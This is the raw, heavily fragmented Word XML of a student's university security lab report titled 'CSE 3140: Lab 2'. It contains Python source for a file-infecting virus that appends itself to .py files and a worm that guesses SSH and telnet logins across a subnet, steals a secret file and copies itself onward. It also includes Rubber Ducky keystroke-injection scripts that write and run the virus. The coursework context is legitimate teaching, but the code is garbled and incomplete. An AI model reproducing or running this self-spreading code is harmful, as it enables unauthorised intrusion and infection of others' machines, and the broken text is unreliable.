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F59C" w14:textId="734811DA" w:rsidR="00BA657F" w:rsidRPr="00702EEE" w:rsidRDefault="00BA657F" w:rsidP="00BA657F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702EEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSE 3140: Lab 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE146C" w14:textId="76682B42" w:rsidR="00BA657F" w:rsidRDefault="00BA657F" w:rsidP="00BA657F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tom McCarthy (tkm20002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503363FA" w14:textId="76F01463" w:rsidR="00806332" w:rsidRDefault="00806332" w:rsidP="00BA657F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Section Z81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A5AE8" w14:textId="2ECD0CDF" w:rsidR="00BA657F" w:rsidRPr="00BA657F" w:rsidRDefault="00BA657F" w:rsidP="00BA657F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VM IP: 172.16.49.96</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA0570" w14:textId="77777777" w:rsidR="00BA657F" w:rsidRDefault="00BA657F" w:rsidP="00BA657F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB6838F" w14:textId="3E7E4D2F" w:rsidR="00035E99" w:rsidRPr="00035E99" w:rsidRDefault="00035E99" w:rsidP="00035E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35E99">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>My first (?) virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C40651" w14:textId="56E47AEA" w:rsidR="00035E99" w:rsidRP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7784E95B" w14:textId="7980C9FC" w:rsid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CBA4841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0172BC29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isfile</w:t>
      </w:r>
      <w:proofErr w:type="spell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9A91C81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newfile</w:t>
      </w:r>
      <w:proofErr w:type="spell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"PythonFiles.txt"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74FC3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7BDB72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5E9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E8046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155641" w14:textId="056846C7" w:rsid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1DEF05FD" w14:textId="002A2B88" w:rsid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7C2BAFC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548C0FE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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C4B70F5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5E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5391E87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virus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B54EB5F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import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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13D67C8C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#Q1 Virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674C2F4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with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open(</w:t>
      </w:r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"Q1B.out", "a") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867D80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for argument in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sys.argv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2D7E9D2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f.write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(argument + " ")"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60321699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"r+"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99C86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2AA8CBC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E5D672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"#Q1 Virus"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60BE90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17B6A6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AE1EA8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virus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DAC4B6" w14:textId="77777777" w:rsidR="00035E99" w:rsidRPr="00035E99" w:rsidRDefault="00035E99" w:rsidP="00035E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B048A" w14:textId="157065C1" w:rsidR="00035E99" w:rsidRP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B389D26" w14:textId="728C68D0" w:rsidR="00035E99" w:rsidRDefault="00035E99" w:rsidP="00035E9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40FCB57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3CF886B9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virus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55530F0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import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504336D6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import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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D9B8CCE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file =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sys.argv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[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1375853E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virus = </w:t>
      </w:r>
      <w:r w:rsidRPr="00035E9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\"\"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E855D2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import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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D53CC3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#Q1 Virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEC136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with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open(</w:t>
      </w:r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"Q1B.out", "a") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6FD13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for argument in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sys.argv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2B78E2D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f.write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(argument + " ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D6511B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with </w:t>
      </w:r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open(</w:t>
      </w:r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file, "r+") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F23CEB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infected = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7617E17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for line in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D320AEC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if "#Q1 Virus" in line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9AE1D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infected = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F97915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if not infected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA6FFB5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f.write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(virus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAC9DDD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\"\"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3122B0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0CC05C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5E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isfile</w:t>
      </w:r>
      <w:proofErr w:type="spell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F3C5E2B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F55BCE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"r+"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CFD2EB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3DB3620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B8184F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"#Q1 Virus"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894865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DAB1F4A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5E9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infected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DC1021" w14:textId="77777777" w:rsidR="00035E99" w:rsidRPr="00035E99" w:rsidRDefault="00035E99" w:rsidP="00035E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5E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5E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virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00035E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7307DB" w14:textId="77777777" w:rsidR="00035E99" w:rsidRPr="00035E99" w:rsidRDefault="00035E99" w:rsidP="00035E99">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A4E8C0" w14:textId="04966764" w:rsidR="008B7F1C" w:rsidRDefault="00A104AB" w:rsidP="00A104AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A104AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approval Code: </w:t>
      </w:r>
      <w:r w:rsidR="008B7F1C" w:rsidRPr="00A104AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OV2N67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC611F5" w14:textId="77777777" w:rsidR="00A104AB" w:rsidRDefault="00A104AB" w:rsidP="00A104AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A099A0C" w14:textId="77777777" w:rsidR="00A104AB" w:rsidRDefault="00A104AB" w:rsidP="00A104AB">
      <w:pPr>
        <w:pStyle w:val="Normal0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My first (?) worm. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563DCB94" w14:textId="1EC29F68" w:rsidR="00A104AB" w:rsidRDefault="00A104AB" w:rsidP="00A104A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CF0972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paramiko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44E28064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telnetlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4064470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proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6205DB6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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15BF65B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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6AAE397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pipes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38E00444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paramiko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SSHClient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1083B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set_missing_host_key_policy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paramiko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AutoAddPolicy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599C33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6E4117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"./Q2worm.py"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"./Solutions"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EEA4F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'./Q2worm.py'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F97A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q2wordcontents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99383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'Q2pwd'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400F1E7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F110FA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C9251A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452972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CC0C1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sshConnect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FB77F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'./Solutions/Q2secrets'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'a+'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352B7F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D283E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banner_timeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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AE37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"Connected using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ssh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using username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password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484E5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paramiko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.ssh_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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exception.NoValidConnectionsError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BB4865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D50045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7805A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47E709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B1901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F2AB2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9C283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4BECEC5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"Getting current directory..."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0F35C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stderr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F07C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2B54F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homedirectory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proofErr w:type="gramStart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6817A6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"Copying contents of Q2secret..."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5FF574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stderr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_command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 Q2secret"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582BD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stdout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95F87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6A03F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"Copying Q2worm to remote..."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7C61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ftp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_sftp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E66D1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ftp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"./Q2worm.py"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homedirectory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"/Q2worm.py"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F4E3C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D40964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78F39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626569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quote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D43A84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D5B03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pipes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quote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54AA1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9CBB8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pipes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quote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D24CD5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telnetConnect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DA62B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'./Solutions/Q2secrets'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'a+'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09F06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A10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try</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10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26597FA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8325C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telnetlib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Telnet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4C08C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_until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"cse3140-HVM-domU login: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A4FF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DB09C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13F176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A231C9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).encode(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0D068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_until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046E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).encode(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6DE2C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_until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incorrect"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A2406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8E04F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61454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3ABB4EC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using telnet to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using username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password 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88C9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"Getting current directory..."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4641F1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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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95C802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_eager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AD74E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"Copying contents of Q2secret..."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6B34E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 Q2secret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D9AACE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q2secret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_eager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7A8AB6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q2secret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2834EC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82FC2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"Copying Q2worm to remote..."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113E4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"touch Q2worm.py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'utf-8'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8E6A1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C89588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'echo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proofErr w:type="spellStart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openssl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base64 -d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quote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b64encode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C15771A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_until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86EE4C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'openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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base64 -d &lt;&lt;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*END*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%b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</w:p>
    <w:p w14:paraId="3970A8E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quote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directory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20BC6AF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encodebytes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q2wordcontents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D20696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*END*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A104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536841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D3758F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51B0D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DF8E87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0F9F87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"172.16.48."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DB6BD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182B67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sshConnect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0F46035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BFB1EF0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DE9A1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CACB22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"172.16.48."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DFC293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385878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telnetConnect</w:t>
      </w:r>
      <w:proofErr w:type="spell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10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2AA6CFFB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C85A899" w14:textId="77777777" w:rsidR="00A104AB" w:rsidRPr="00A104AB" w:rsidRDefault="00A104AB" w:rsidP="00A104A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0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0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4E12AF" w14:textId="77777777" w:rsidR="00A104AB" w:rsidRDefault="00A104AB" w:rsidP="00A104AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140911C8" w14:textId="26B43069" w:rsidR="00D607EC" w:rsidRDefault="00D607EC" w:rsidP="00A104AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This code takes a long time to run and test all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>machines</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so this is a screenshot of the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463C1BA1" w14:textId="7597F95E" w:rsidR="00D607EC" w:rsidRPr="00A104AB" w:rsidRDefault="00BF6461" w:rsidP="00A104A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6746C" wp14:editId="777DAD18">
            <wp:extent cx="5943600" cy="1015365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112450387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3878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624D" w14:textId="6F05CC11" w:rsidR="008B7F1C" w:rsidRDefault="00A104AB" w:rsidP="00A10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Approval Code: </w:t>
      </w:r>
      <w:r w:rsidR="008B7F1C" w:rsidRPr="00A104AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MXMJV4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBEDF5" w14:textId="77777777" w:rsidR="007F05BE" w:rsidRDefault="007F05BE" w:rsidP="00A104AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7D2A5A" w14:textId="6CAE1833" w:rsidR="007F05BE" w:rsidRPr="007F05BE" w:rsidRDefault="007F05BE" w:rsidP="007F05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First step toward my first (?) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USB-Transmitted Malware (UTM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81C75B" w14:textId="73D0C319" w:rsidR="007F05BE" w:rsidRDefault="007F05BE" w:rsidP="007F05BE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727C3CAE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1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330CFD5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GUI r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A1D228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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35080FB7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STRING notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FA864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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBADB0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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D431CF7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STRING echo Tom McCarthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB1C61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CTRL s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C773F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750</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7AD10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STRING Q3.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A771E59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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D40682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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0AA2AF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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060FFE47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GUI r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A9015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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A96487F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 xml:space="preserve">STRING </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F05BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72682C4A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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21781257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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16644609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STRING cd C:\Users\tomkm\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF841D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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC12E4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DELAY 250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CDA42D" w14:textId="77777777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STRING Q3.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AC942E" w14:textId="492002AD" w:rsidR="007F05BE" w:rsidRPr="007F05BE" w:rsidRDefault="007F05BE" w:rsidP="007F05BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F05BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C125B7" w14:textId="09281C64" w:rsidR="008B7F1C" w:rsidRDefault="00FC4766" w:rsidP="00FC4766">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approval Code: </w:t>
      </w:r>
      <w:r w:rsidR="008B7F1C" w:rsidRPr="00FC4766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1HVYFV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FBF0C" w14:textId="4B92ADA2" w:rsidR="00FC4766" w:rsidRPr="00FC4766" w:rsidRDefault="00FC4766" w:rsidP="00FC476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4766">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Same as question 3, but this time your Rubber-Ducky script should write and run a Python `hello world’ script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CBA58" w14:textId="68D1A40A" w:rsidR="00FC4766" w:rsidRDefault="00FC4766" w:rsidP="00FC476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769C34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1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F756C15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GUI r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C0540B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lastRenderedPageBreak/>
        <w:t>DELAY 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6511EC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STRING notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D621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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259515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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379264E7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 xml:space="preserve">STRING </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"Hello, world!\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0635B3C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CTRL s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EE38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750</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ABDD7A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STRING Q4.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245C81F1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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF1AE41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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B6B3D3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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D990A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GUI r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F850A59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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAB986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 xml:space="preserve">STRING </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50DBFE34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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3F765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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26A3BF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STRING cd C:\Users\tomkm\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64D037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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94DBAB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DELAY 250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC1B8A" w14:textId="77777777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STRING python Q4.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF999F" w14:textId="4C79770A" w:rsidR="00FC4766" w:rsidRPr="00FC4766" w:rsidRDefault="00FC4766" w:rsidP="00FC4766">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D1DC2" w14:textId="4972FE65" w:rsidR="008B7F1C" w:rsidRDefault="00FC4766" w:rsidP="00FC4766">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approval Code: </w:t>
      </w:r>
      <w:r w:rsidR="008B7F1C" w:rsidRPr="00FC4766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0YLKGR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA1011" w14:textId="77777777" w:rsidR="00FC4766" w:rsidRDefault="00FC4766" w:rsidP="00FC476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  <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4766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Same as question 4, but this time your Python script, to be uploaded, saved and run, will be the simple Python virus of question 1 (Q1C.py). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A37F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1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC20CA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GUI r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BF0FA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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E089B4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notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39174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583FED7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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2786D2D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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A525FC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53277C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virus = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2985E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2001BCE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import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB83A7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1FA8A81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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444B2A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7A866AA9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file =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sys.argv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[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6C5D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2BD17B7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lastRenderedPageBreak/>
        <w:t>STRING virus = \"\"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B39D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78668EE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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184E45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23804D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#Q1 Virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D966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C1FA40A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with </w:t>
      </w:r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open(</w:t>
      </w:r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"Q1B.out", "a") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4FD6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0FDB511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BC270A9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for argument in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sys.argv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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69020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607F791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556650B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2E6F151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f.write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(argument + " ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7689C34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1E14D75B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with </w:t>
      </w:r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open(</w:t>
      </w:r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file, "r+") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209674D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70CE0C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541709A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infected = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9443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41A22C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9B52CB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for line in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681756B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0F827D4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C0C42B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D67417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if "#Q1 Virus" in line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48334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75E4D11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6370B9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8C499C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594BBBF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infected = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49778CD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0A62C2D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09DA58F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if not infected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189332C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620ECCB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CD1321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307BAED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f.write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(virus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF4C2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5E48D95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\"\"\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6DDC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07363EA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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F85E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991EAC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files = [f for f in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os.listdir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('.') if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os.path.isfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(f) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f.endswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9B78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lastRenderedPageBreak/>
        <w:t>ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3295F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for file in files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF784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3A6E08A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7400DB4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with </w:t>
      </w:r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open(</w:t>
      </w:r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file, "r+") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA59F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C8B152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3EB755A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A5CE0E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infected = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BAD9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EB061B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0FA2535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1634B7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for line in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395272B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2B088F1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0265EAFB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AF4443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27E9280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if "#Q1 Virus" in line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B17AA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51BBE21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2FDC67E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358A54C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6E2D339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16CDFA64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infected = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B892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109940D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25916E6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0ED0687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if not infected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C459C09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580058C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5B61A48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4BF097C5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TAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FB2F2A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
